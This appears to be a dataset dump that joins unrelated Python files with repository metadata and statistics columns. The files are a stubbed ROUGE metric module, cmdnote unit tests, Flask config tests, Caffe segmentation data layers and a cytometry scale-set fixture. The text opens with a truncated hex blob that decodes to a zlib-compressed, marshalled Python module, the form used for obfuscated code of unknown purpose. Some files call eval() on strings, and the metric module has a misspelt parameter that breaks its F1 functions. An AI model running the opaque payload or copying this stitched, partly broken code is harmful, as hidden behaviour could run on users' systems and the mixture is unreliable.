1315C7864315C7831395C786134705C7862625C7864625C786330585C7830665C7866635C7863395C7838325C7861315C7864365C7831315C7866655C786239645C78393551695C7864365C7864625C783131706E6778755C7864655C783834265C7866305C783931705C275C78386673535C786362705C7862665C7861395C7831305C7831305C786362365C7861385C7865385C7865355C7839385C786533545C7866385C786361505C7861395C7866375C7861625C7861663E7D385C7865615C7862302E6C5C786565485C7862325C78393025235C7838635C275C7839627D5C783866355C7862375C7831615E555C7861345C7862655C7864655A5C7865625C7866355C7863325C7862615F5C725C7861385C786162555C7861375C7864335C7861343D5C7865622E5C7862625B5C7862385C7839335B5C7866375C7865645C7861315C7839375C786561545C7861375C7862625C7838625C786162555C7865375C7838666A5C7866657E5A5C7864395C7866612F5C7839375C7831635C7838645C7863625C7866665C7861326E5C7862655C7838305C7863635C786162355C786135495C7861395C7863667C2872365C7862655C7831305C7831645C7861645C7863305C7866645549762B5C7863625C7861615C7866635C7831365C7863365C7830345C7863655C7830345C7830635C7838345A5C7865395C7861645C7861355C7866644C2241482A5C7839305C7838635C786231445C7830303D5C7866345C783930615C7863385C6E585C5C5C7830387C5C7838345C7864314A5C7863397A3A5C7864375C7861625C7862375C7864365C7864365C7839365C7865625C7862305C7864395C7861316F79555C78396578367D5C7861384B57555C786562605C78616173755C7830365C7866615C725C7866365C7839615C7864365C7830315C7839655C725C783830205C7830385C7864345C7831392A5C7830385C7861305C7863335C783038205C786233405C7838625C783161545C783864465C7864353D5C7866655C7830375C786538772164285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 2,624.8 | 13,008 | 0.997638 | 18 | 13,124 | 727.277778 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.857361 | 0.001067 | 13,124 | 5 | 13,008 | 2,624.8 | 0.14119 | 0.007239 | 0 | 0 | 0 | 0 | 0.996622 | 0.996622 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
ba9cf909d3469116e35a97edb0a9d7aa93dded4e | 2,229 | py | Python | calculate_metrics.py | qwang70/PreSumm | b2c3aee0ada7f5fa8754dffd44355b956fe0d45b | [
"MIT"
] | 1 | 2019-12-13T05:45:56.000Z | 2019-12-13T05:45:56.000Z | calculate_metrics.py | qwang70/PreSumm | b2c3aee0ada7f5fa8754dffd44355b956fe0d45b | [
"MIT"
] | null | null | null | calculate_metrics.py | qwang70/PreSumm | b2c3aee0ada7f5fa8754dffd44355b956fe0d45b | [
"MIT"
] | 1 | 2019-12-02T21:56:16.000Z | 2019-12-02T21:56:16.000Z | # import...
def compute_precision(ref, candidate):
"""
Same as Rouge-1 Precision.
Compute the percentage of the words in the candidate summary
that are also present in the reference summary.
Input:
ref: String
candidate: String
Return: float
Ignore non-words like <q>, \n, period, comma...
Example:
ref: the cat was under the bed
candidate: the cat was found under the bed
Result: 6/7=0.86
"""
pass
def compute_recall(ref, candidate):
"""
Same as Rouge-1 Recall, or simply Rouge-1.
Compute the percentage of the words in the reference summary
that are also present in the candidate summary.
Input:
ref: String
candidate: String
Return: float
Ignore non-words like <q>, \n, period, comma...
Example:
ref: the cat was under the bed
candidate: the cat was found under the bed
Result: 1.0
"""
pass
def compute_f1(ref, candiate):
recall = compute_recall(ref, candidate)
precision = compute_precision(ref, candidate)
return 2. * recall * precision / (recall + precision)
def compute_rouge2_precision(ref, candidate):
"""
Compute the percentage of the 2-grams words in the candidate summary
that are also present in the reference summary.
Input:
ref: String
candidate: String
Return: float
Ignore non-words like <q>, \n, period, comma...
Example:
ref: the cat was under the bed
candidate: the cat was found under the bed
Result: 0.67
"""
pass
def compute_rouge2_recall(ref, candidate):
"""
Compute the percentage of the 2-grams words in the reference summary
that are also present in the candidate summary.
Input:
ref: String
candidate: String
Return: float
Ignore non-words like <q>, \n, period, comma...
Example:
ref: the cat was under the bed
candidate: the cat was found under the bed
Result: 0.8
"""
pass
def compute_rouge2_f1(ref, candiate):
recall = compute_rouge2_recall(ref, candidate)
precision = compute_rouge2_precision(ref, candidate)
return 2. * recall * precision / (recall + precision)
| 22.744898 | 73 | 0.646927 | 300 | 2,229 | 4.756667 | 0.18 | 0.067274 | 0.050456 | 0.061668 | 0.910301 | 0.789068 | 0.755431 | 0.755431 | 0.720392 | 0.639103 | 0 | 0.016109 | 0.275908 | 2,229 | 97 | 74 | 22.979381 | 0.86803 | 0.709735 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.25 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
bad3a56f6f4e37a35730bc4e298b1d23a302ca6e | 11,004 | py | Python | tests/test_cmdnote.py | zianke/cmdnote | 725271a195748092a9a4134ae9d4167dcff4803d | [
"MIT"
] | null | null | null | tests/test_cmdnote.py | zianke/cmdnote | 725271a195748092a9a4134ae9d4167dcff4803d | [
"MIT"
] | null | null | null | tests/test_cmdnote.py | zianke/cmdnote | 725271a195748092a9a4134ae9d4167dcff4803d | [
"MIT"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch
import tempfile
from cmdnote import CmdNote, const, exception
from .utils import *
class TempCmdNote():
def __enter__(self):
self.notebook_fd = tempfile.NamedTemporaryFile()
self.config_fd = tempfile.NamedTemporaryFile()
return CmdNote(self.notebook_fd.name, self.config_fd.name)
def __exit__(self, type, value, traceback):
self.notebook_fd.close()
self.config_fd.close()
class TestCmdNote(TestCase):
def test_func(self):
with TempCmdNote() as cmdnote:
with captured_sys_stdout() as sysout:
cmdnote.func()
output = sysout.getvalue().strip()
self.assertEqual(output, 'function cmdnote() { eval "$(command cmdnote "$@")"; }')
def test_append(self):
with TempCmdNote() as cmdnote:
cmdnote.append(None, None)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 0)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.append(None, 'echo "hello"\nls -l')
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 2)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.append(None, 'echo "hello"')
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 5)
self.assertEqual(command_idx, 0)
self.assertEqual(commands[0], 'ls -l')
self.assertEqual(commands[-1], 'echo "hello"')
def test_insert(self):
with TempCmdNote() as cmdnote:
cmdnote.insert(None, None)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 0)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.insert(TEST_FILE, None)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.insert(None, 'echo "hello"\nls -l')
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 2)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.insert(TEST_FILE, None)
cmdnote.insert(None, 'echo "hello"')
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 5)
self.assertEqual(command_idx, 0)
self.assertEqual(commands[0], 'echo "hello"')
self.assertEqual(commands[-1], 'echo $MY_ENV_VAR')
def test_list(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
with captured_output() as (out, err):
cmdnote.list()
output = out.getvalue().strip()
self.assertEqual(len(output.split('\n')), 4)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
with captured_output() as (out, err):
cmdnote.list()
output = out.getvalue().strip()
self.assertEqual(len(output.split('\n')), 3)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
with captured_output() as (out, err):
cmdnote.list(True)
output = out.getvalue().strip()
self.assertEqual(len(output.split('\n')), 4)
def test_next(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
with captured_output() as (out, err):
with captured_sys_stdout() as sysout:
with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
cmdnote.next()
self.assertTrue('ls -l' in out.getvalue().strip())
self.assertTrue('ls -l' in sysout.getvalue().strip())
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 1)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
with captured_output() as (out, err):
with captured_sys_stdout() as sysout:
with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_ABORT):
cmdnote.next()
self.assertTrue('ls -l' in out.getvalue().strip())
self.assertTrue('ls -l' not in sysout.getvalue().strip())
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
with captured_output() as (out, err):
with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
cmdnote.next()
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 0)
self.assertEqual(command_idx, 0)
def test_prev(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
with captured_output() as (out, err):
with captured_sys_stdout() as sysout:
with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
cmdnote.prev()
self.assertTrue('ls -l' in out.getvalue().strip())
self.assertTrue('ls -l' in sysout.getvalue().strip())
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 1)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
with captured_output() as (out, err):
with captured_sys_stdout() as sysout:
with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_ABORT):
cmdnote.prev()
self.assertTrue('ls -l' in out.getvalue().strip())
self.assertTrue('ls -l' not in sysout.getvalue().strip())
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 1)
with TempCmdNote() as cmdnote:
with captured_output() as (out, err):
with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
cmdnote.prev()
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 0)
self.assertEqual(command_idx, 0)
def test_seek(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.seek(2)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 2)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(2)
cmdnote.seek(-1)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 1)
def test_clear(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.clear()
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 0)
self.assertEqual(command_idx, 0)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
cmdnote.clear()
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 1)
self.assertEqual(command_idx, 1)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
cmdnote.clear(True)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 0)
self.assertEqual(command_idx, 0)
def test_play(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
with captured_sys_stdout() as sysout:
cmdnote.play()
output = sysout.getvalue().strip()
self.assertEqual(output.count('ls -l'), 2)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 4)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
with captured_sys_stdout() as sysout:
cmdnote.play(repeat=5)
output = sysout.getvalue().strip()
self.assertEqual(output.count('ls -l'), 10)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 4)
def test_config(self):
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(3)
cmdnote.config(capacity=2)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 2)
self.assertEqual(command_idx, 1)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
cmdnote.notebook.move_commands(1)
self.assertRaises(exception.NotebookCapacityError, cmdnote.config, capacity=2)
commands, command_idx = cmdnote.notebook.read_commands()
self.assertEqual(len(commands), 4)
self.assertEqual(command_idx, 1)
with TempCmdNote() as cmdnote:
cmdnote.append(TEST_FILE, None)
with captured_output() as (out, err):
cmdnote.config()
output = out.getvalue().strip()
self.assertTrue('capacity' in eval(output))
| 45.659751 | 98 | 0.587786 | 1,178 | 11,004 | 5.35399 | 0.078947 | 0.133185 | 0.075472 | 0.106548 | 0.900111 | 0.881877 | 0.877438 | 0.852069 | 0.852069 | 0.852069 | 0 | 0.00916 | 0.305525 | 11,004 | 240 | 99 | 45.85 | 0.816148 | 0 | 0 | 0.765487 | 0 | 0 | 0.031897 | 0.01145 | 0 | 0 | 0 | 0 | 0.292035 | 1 | 0.053097 | false | 0 | 0.022124 | 0 | 0.088496 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bad8a2e49db8e427110bccf3ab4120cf8593c8c0 | 947 | py | Python | app/tests/unit/test_config.py | sun-fengcai/flask_template | fc6c5963ac9ac632c83d81c7b62ab74d7e99d02d | [
"MIT"
] | 3 | 2019-11-16T06:51:17.000Z | 2019-11-21T01:18:31.000Z | app/tests/unit/test_config.py | sun-fengcai/flask_template | fc6c5963ac9ac632c83d81c7b62ab74d7e99d02d | [
"MIT"
] | 27 | 2019-11-17T13:56:49.000Z | 2021-06-28T12:04:18.000Z | app/tests/unit/test_config.py | sun-fengcai/flask_template | fc6c5963ac9ac632c83d81c7b62ab74d7e99d02d | [
"MIT"
] | 1 | 2021-04-23T23:57:28.000Z | 2021-04-23T23:57:28.000Z | import os
def test_development_config(test_app):
test_app.config.from_object("app.config.DevelopmentConfig")
assert test_app.config.get("SECRET_KEY")
assert not test_app.config["TESTING"]
assert test_app.config["SQLALCHEMY_DATABASE_URI"] == os.environ.get(
"DATABASE_URL"
)
def test_testing_config(test_app):
test_app.config.from_object("app.config.TestingConfig")
assert test_app.config.get("SECRET_KEY")
assert test_app.config["TESTING"]
assert not test_app.config["PRESERVE_CONTEXT_ON_EXCEPTION"]
assert test_app.config["SQLALCHEMY_DATABASE_URI"] == os.environ.get(
"DATABASE_TEST_URL"
)
def test_production_config(test_app):
test_app.config.from_object("app.config.ProductionConfig")
assert test_app.config.get("SECRET_KEY")
assert not test_app.config["TESTING"]
assert test_app.config["SQLALCHEMY_DATABASE_URI"] == os.environ.get(
"DATABASE_URL"
)
| 31.566667 | 72 | 0.736008 | 128 | 947 | 5.125 | 0.21875 | 0.170732 | 0.257622 | 0.202744 | 0.792683 | 0.728659 | 0.728659 | 0.728659 | 0.672256 | 0.672256 | 0 | 0 | 0.147835 | 947 | 29 | 73 | 32.655172 | 0.812887 | 0 | 0 | 0.434783 | 0 | 0 | 0.284055 | 0.186906 | 0 | 0 | 0 | 0 | 0.434783 | 1 | 0.130435 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24030e9dd3962f15c25b2ad6dcf6461462457a23 | 9,305 | py | Python | files/Segment/workspace/model/FPN/voc_layers.py | Vertical-Beach/ai-edge-contest4 | 4b5211a9adb383756acade42c8a8b104f6fd7363 | [
"Apache-2.0"
] | 3 | 2021-02-13T05:16:10.000Z | 2022-03-08T16:00:02.000Z | files/Segment/workspace/model/FPN/voc_layers.py | Vertical-Beach/ai-edge-contest4 | 4b5211a9adb383756acade42c8a8b104f6fd7363 | [
"Apache-2.0"
] | null | null | null | files/Segment/workspace/model/FPN/voc_layers.py | Vertical-Beach/ai-edge-contest4 | 4b5211a9adb383756acade42c8a8b104f6fd7363 | [
"Apache-2.0"
] | null | null | null | import caffe
import numpy as np
import cv2
import random
from PIL import Image
class BDD100KDataLayer(caffe.Layer):
"""
Load (input image, label image) pairs from the SBDD extended labeling
of PASCAL VOC for semantic segmentation
one-at-a-time while reshaping the net to preserve dimensions.
Use this to feed data to a fully convolutional network.
"""
def setup(self, bottom, top):
"""
Setup data layer according to parameters:
- sbdd_dir: path to SBDD `dataset` dir
- split: train / seg11valid
- mean: tuple of mean values to subtract
- randomize: load in random order (default: True)
- seed: seed for randomization (default: None / current time)
for SBDD semantic segmentation.
N.B.segv11alid is the set of segval11 that does not intersect with SBDD.
Find it here: https://gist.github.com/shelhamer/edb330760338892d511e.
example
params = dict(sbdd_dir="/path/to/SBDD/dataset",
mean=(104.00698793, 116.66876762, 122.67891434),
split="valid")
"""
# config
params = eval(self.param_str)
self.bdd100k_label_dir = params['bdd100k_label_dir']
self.bdd100k_image_dir = params['bdd100k_image_dir']
self.filelist = params['filelist']
self.mean = np.array(params['mean'])
self.random = params.get('randomize', True)
self.seed = params.get('seed', None)
self.resize_size_y = int(params.get('resize_size_y', 256))
self.resize_size_x = int(params.get('resize_size_x', 512))
self.scale = params.get('scale', 0.022)
self.batch_size = int(params.get('batch_size', 4))
self.nof_data_on_memory = params.get('nof_data_on_memory', 0)
# two tops: data and label
if len(top) != 2:
raise Exception("Need to define two tops: data and label.")
# data layers have no bottoms
if len(bottom) != 0:
raise Exception("Do not define a bottom.")
# load indices for images and labels
self.datapaths = open(self.filelist, 'r').read().splitlines()
self.datas = []
self.labels = []
# self.datapaths = self.datapaths[:1]
for i, datapath in enumerate(self.datapaths):
if self.nof_data_on_memory <= i:
break
print("loading " + str(i))
self.datas.append(self.load_image(datapath))
self.labels.append(self.load_label(datapath))
random.seed(self.seed)
def reshape(self, bottom, top):
# reshape tops to fit (leading 1 is for batch dimension)
top[0].reshape(self.batch_size, 3, self.resize_size_y, self.resize_size_x)
top[1].reshape(self.batch_size, 1, self.resize_size_y, self.resize_size_x)
def forward(self, bottom, top):
# assign output
for i in range(self.batch_size):
idx = random.randint(0, len(self.datapaths)-1)
if idx < self.nof_data_on_memory:
top[0].data[i, ...] = self.datas[idx]
top[1].data[i, ...] = self.labels[idx]
else:
top[0].data[i, ...] = self.load_image(self.datapaths[idx])
top[1].data[i, ...] = self.load_label(self.datapaths[idx])
def backward(self, top, propagate_down, bottom):
pass
def load_image(self, idx):
"""
Load input image and preprocess for Caffe:
- cast to float
- multiply scale value
- subtract mean
- switch channels RGB -> BGR
- transpose to channel x height x width order
"""
im = Image.open('{}/{}.jpg'.format(self.bdd100k_image_dir, idx))
in_ = np.array(im, dtype=np.float32)
in_ = cv2.resize(in_, (self.resize_size_x, self.resize_size_y))
in_ = in_ * self.scale
in_ -= self.mean
in_ = in_[:,:,::-1]
in_ = in_.transpose((2,0,1))
return in_
def load_label(self, idx):
"""
Load label image as 1 x height x width integer array of label indices.
The leading singleton dimension is required by the loss.
"""
pil_img = Image.open('{}/{}_train_id.png'.format(self.bdd100k_label_dir, idx))
img = np.asarray(pil_img)
#car 13 road 0 person 11 signal 6
OTHER = 4
img = np.where((img != 0) & (img != 6) & (img != 11) & (img != 13), OTHER, img)
#road 0 person 1 signal 2 car 3 other 4
img = np.where(img == 11, 1, img)
img = np.where(img == 6, 2, img)
img = np.where(img == 13, 3, img)
img = cv2.resize(img, (self.resize_size_x, self.resize_size_y), interpolation=cv2.INTER_NEAREST)
label = img[np.newaxis, ...]
return label
class SignateDataLayer(caffe.Layer):
"""
Load (input image, label image) pairs from the SBDD extended labeling
of PASCAL VOC for semantic segmentation
one-at-a-time while reshaping the net to preserve dimensions.
Use this to feed data to a fully convolutional network.
"""
def setup(self, bottom, top):
"""
Setup data layer according to parameters:
- sbdd_dir: path to SBDD `dataset` dir
- split: train / seg11valid
- mean: tuple of mean values to subtract
- randomize: load in random order (default: True)
- seed: seed for randomization (default: None / current time)
for SBDD semantic segmentation.
N.B.segv11alid is the set of segval11 that does not intersect with SBDD.
Find it here: https://gist.github.com/shelhamer/edb330760338892d511e.
example
params = dict(sbdd_dir="/path/to/SBDD/dataset",
mean=(104.00698793, 116.66876762, 122.67891434),
split="valid")
"""
# config
params = eval(self.param_str)
self.signate_label_dir = params['signate_label_dir']
self.signate_image_dir = params['signate_image_dir']
self.filelist = params['filelist']
self.mean = np.array(params['mean'])
self.random = params.get('randomize', True)
self.seed = params.get('seed', None)
self.resize_size_y = int(params.get('resize_size_y', 256))
self.resize_size_x = int(params.get('resize_size_x', 512))
self.scale = params.get('scale', 0.022)
self.batch_size = int(params.get('batch_size', 4))
self.nof_data_on_memory = params.get('nof_data_on_memory', False)
# two tops: data and label
if len(top) != 2:
raise Exception("Need to define two tops: data and label.")
# data layers have no bottoms
if len(bottom) != 0:
raise Exception("Do not define a bottom.")
# load indices for images and labels
self.datapaths = open(self.filelist, 'r').read().splitlines()
self.datas = []
self.labels = []
# self.datapaths = self.datapaths[:1]
for i, datapath in enumerate(self.datapaths):
if self.nof_data_on_memory <= i:
break
print("loading " + str(i))
self.datas.append(self.load_image(datapath))
self.labels.append(self.load_label(datapath))
random.seed(self.seed)
def reshape(self, bottom, top):
# reshape tops to fit (leading 1 is for batch dimension)
top[0].reshape(self.batch_size, 3, self.resize_size_y, self.resize_size_x)
top[1].reshape(self.batch_size, 1, self.resize_size_y, self.resize_size_x)
def forward(self, bottom, top):
# assign output
for i in range(self.batch_size):
idx = random.randint(0, len(self.datapaths)-1)
if idx < self.nof_data_on_memory:
top[0].data[i, ...] = self.datas[idx]
top[1].data[i, ...] = self.labels[idx]
else:
top[0].data[i, ...] = self.load_image(self.datapaths[idx])
top[1].data[i, ...] = self.load_label(self.datapaths[idx])
def backward(self, top, propagate_down, bottom):
pass
def load_image(self, idx):
"""
Load input image and preprocess for Caffe:
- cast to float
- multiply scale value
- subtract mean
- switch channels RGB -> BGR
- transpose to channel x height x width order
"""
im = Image.open('{}/{}.jpg'.format(self.signate_image_dir, idx))
in_ = np.array(im, dtype=np.float32)
in_ = cv2.resize(in_, (self.resize_size_x, self.resize_size_y))
in_ = in_ * self.scale
in_ -= self.mean
in_ = in_[:,:,::-1]
in_ = in_.transpose((2,0,1))
return in_
def load_label(self, idx):
"""
Load label image as 1 x height x width integer array of label indices.
The leading singleton dimension is required by the loss.
"""
path = '{}/{}.dat'.format(self.signate_label_dir, idx)
fp = open(path,'rb')
dat = np.fromfile(fp, np.uint8, -1)
fp.close()
dat = dat.reshape((1216, 1936, 1))
dat = cv2.resize(dat, (self.resize_size_x, self.resize_size_y), interpolation=cv2.INTER_NEAREST)
#road 0 person 1 signal 2 car 3 other 4
label = dat[np.newaxis, ...]
return label
| 39.096639 | 104 | 0.596668 | 1,253 | 9,305 | 4.308061 | 0.177973 | 0.044461 | 0.051871 | 0.027788 | 0.892923 | 0.886995 | 0.881067 | 0.881067 | 0.881067 | 0.881067 | 0 | 0.036514 | 0.284793 | 9,305 | 237 | 105 | 39.261603 | 0.774606 | 0.289737 | 0 | 0.755906 | 0 | 0 | 0.069863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.094488 | false | 0.015748 | 0.03937 | 0 | 0.181102 | 0.015748 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2422207674ef73541fcd886848624ae2cd91c8d4 | 6,341 | py | Python | tests/fixtures/api-scalesets.py | primitybio/cellengine-python-toolk | 1f9dd168f1f27e2beba69f02e340371190857b33 | [
"MIT"
] | 4 | 2021-01-12T17:03:37.000Z | 2021-12-16T13:23:57.000Z | tests/fixtures/api-scalesets.py | primitybio/cellengine-python-toolk | 1f9dd168f1f27e2beba69f02e340371190857b33 | [
"MIT"
] | 61 | 2021-01-11T05:27:16.000Z | 2022-03-08T01:50:09.000Z | tests/fixtures/api-scalesets.py | primitybio/cellengine-python-toolkit | 1f9dd168f1f27e2beba69f02e340371190857b33 | [
"MIT"
] | null | null | null | import pytest
@pytest.fixture(scope="session")
def scalesets():
scalesets = {
"__v": 0,
"_id": "5d38a6f79fae87499999a74c",
"experimentId": "5d38a6f79fae87499999a74b",
"name": "Scale Set 1",
"scales": [
{
"channelName": "FSC-A",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
{
"channelName": "FSC-H",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
{
"channelName": "FSC-W",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
{
"channelName": "SSC-A",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
{
"channelName": "SSC-H",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
{
"channelName": "SSC-W",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
{
"channelName": "Blue530-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Blue695-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Vio450-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Vio525-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Vio585-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Vio605-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Vio710-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Vio655-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Red780-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "UV530-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Red670-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "YG780-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "YG610-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "YG670-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Red730-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "YG710-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "UV450-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "YG582-A",
"scale": {
"cofactor": 150,
"maximum": 262144,
"minimum": -200,
"type": "ArcSinhScale",
},
},
{
"channelName": "Time",
"scale": {"maximum": 262144, "minimum": 1, "type": "LinearScale"},
},
],
"updated": "2019-07-24T18:44:07.664Z",
}
return scalesets
